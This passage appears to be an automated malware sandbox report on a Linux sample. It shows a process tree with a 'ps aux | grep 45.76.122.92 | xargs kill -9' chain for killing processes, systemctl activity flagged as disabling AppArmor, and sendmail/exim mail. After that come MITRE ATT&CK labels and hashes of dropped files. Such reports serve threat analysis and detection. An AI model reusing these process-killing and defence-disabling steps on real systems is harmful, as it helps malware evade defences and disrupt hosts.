  grep 45.76.122.92
  2⤵
  PID:1002
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1000
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1003
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1004

/usr/sbin/sendmail
sendmail -t
1⤵
PID:687
- /usr/sbin/exim4
  /usr/sbin/exim4 -Mc 1ri8M2-0000B5-HQ
  2⤵
  - Reads CPU attributes
  PID:766

/usr/sbin/sendmail
sendmail -t
1⤵
PID:689
- /usr/sbin/exim4
  /usr/sbin/exim4 -Mc 1ri8M2-0000B7-HR
  2⤵
  - Reads CPU attributes
  PID:765

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:709

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Enumerates kernel/hardware configuration
PID:708

/bin/sed
sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
1⤵
PID:755

/bin/systemctl
systemctl list-unit-files --full "--type=socket"
1⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
PID:754

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
820B

MD5
1737322b76407279533b004cd35b75ee

SHA1
0e9052d6bf6cb8119ae66a5b7e375301b01ee595

SHA256
1aaad1c50775db0e9b2a9eec1ed5aa571b40508e5d431099b29f1ff2d13d3636

SHA512
ffe10af4651d02b0e0ce052df9bb1e1f0ef4873384a37c131a58473a7e8633738b6c2241d8639a6aace1e6b401e51136e375123c651e749d52b8760361959f28

Download Submit
/var/mail/user

Filesize
1KB

MD5
660eaf40201c8b4341d1f86243260fcd

SHA1
f23fb2073a9b5eb5f8bbb995f3f6d358a790ddc3

SHA256
18e443bd94441ac90e75d746d7ed2a4738d0587cf89690031bea2d1f99e15dac

SHA512
6b7b830fffc8e2a32090247130087e960e637cfe89f7de2957520568e54b3a19e6a19b69a2f07f1b5de7af19d8db5c273509e10578a57d658ffb052034d80dd6

Download Submit
/var/spool/exim4/input/1ri8M2-0000B5-HQ-D

Filesize
126B

MD5
1adfd6cf98c23d836a7717934b70917d

SHA1
cf7275d1865b6d6fbfecb9050c76b2df8aae8e89

SHA256
d5bbae713b8ab37e220a0de1b75233796ebd8ea61d6a65f620b4ecac54ee8306

SHA512
5e0bc63c2fd6ce01832a423728079df28d9820924ebbf2bf3a4f980b6a3e17773e68ddfb355a571c429c400716457bfe80740b2a86521173d8bfd186266d6061

Download Submit
/var/spool/exim4/input/1ri8M2-0000B5-HQ-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1ri8M2-0000B7-HR-D

Filesize
145B

MD5
971e767748c9d6ce7903eaac6973098f

SHA1
b7ebf5975c1231a56ab2330e7f2736f59ed0a36d

SHA256
bb7004afce7028eb7def53c910c091ff0e3ea2a2f44fe0695a8c2c8641646530

SHA512
b8e7ea9588d8ba84c70419bae082a12886633b4b06827d7bbe600af2f3e7549c7e6c9a934ba7af41e1aa2b509f0f7fef57fa08ac028e26209a2d4a2115ef82bc

Download Submit
/var/spool/exim4/input/hdr.689

Filesize
912B

MD5
88f00df70451df2c3e7dcaa8eb5ae06b

SHA1
e16bd1c04040a92796a375b59b39a82da1d547d7

SHA256
ae6668a51265180a964f68bf725411331e23f33fdc077c1644b4162a4480d4e5

SHA512
21918ff6927db77961208a4c4224416c865b24eedd704e54756e0cfb3387205673434451243494b86209b2854cb58b967ce8abe1bd0b521bffb0a2d5f575ccb7

Download Submit
/var/spool/exim4/msglog/1ri8M2-0000B5-HQ

Filesize
288B

MD5
ba4726b7aaeddbc09b6c7f89744c36ff

SHA1
c9ed9c84c8b81b800de887c9cbe12d391c33b74f

SHA256
e33969c4dc0efe38549169cb56235e485a9e21664d14a2635922b7480a4fe828

SHA512
79bf3a999948720d77615abc92d425585899a0d1003b3d977d15e602b74c3e402c66c3510d1b25e1db4f2d0c95957703f56c4993220d466761d4779fa33978d6

Download Submit
/var/spool/exim4/msglog/1ri8M2-0000B5-HQ

Filesize
89B

MD5
5bf7a988d6430ec01960761077f17755

SHA1
da8ab176783e97f1886885a2a24a205d694caa54

SHA256
3b41af10170fc096251ee62112bf05c69ebdec48ddef8a753946ce5b2147f9b3

SHA512
b7dc1958fdf015fcb589cf229d9f45b3395d2d31b1f5a309e043a4bb8cd4147c1b120fa08b83626bc8c29f88710c048cb0693c2b9990d1f0a0336398bdda13bb

Download Submit
/var/spool/exim4/msglog/1ri8M2-0000B7-HR

Filesize
288B

MD5
7fd5b5da9ee2f18016eeee6451346c9f

SHA1
cbe6f3073206a4b1b84e2448c71bf8afb6d3fc6b

SHA256
483e222ab13d302334250de9ec6761f5ca9cfce2b1f6ce6fd9ed5a7d01ce7ed8

SHA512
f557e8c9a26593d685eb6b11a44741f5dfc4a3355d31c41e43f215245e1afa68eccd3b76c31a53fdd973f3b44838d63be5060846f5c381636bd88e0f26ae2786

Download Submit
/var/spool/exim4/msglog/1ri8M2-0000B7-HR

Filesize
89B

MD5
4fc42bcd7624c2d556ba3cf6a2721336

SHA1
6b78fdf14307ad1dbeb1d63049b3ff8b77648eff

SHA256
943c59bf212eecfb84718b395c9c79424ae1ad89c55dca6efb4a875638ba2314

SHA512
2c91207606196fd513a676bace0bcefe607d2716ca2c77d46dd1d0acf5a2c0b8d47c9a669b8d4351cd2510c5dd039986166e46a68374f69d406d7bd0898c0fd1

Download Submit
memory/906-1-0xb6c5d000-0xb6c6e044-memory.dmp

Download
memory/929-2-0xb6c2a000-0xb6c3b044-memory.dmp

Download
memory/971-3-0xb6b81000-0xb6b92044-memory.dmp

Download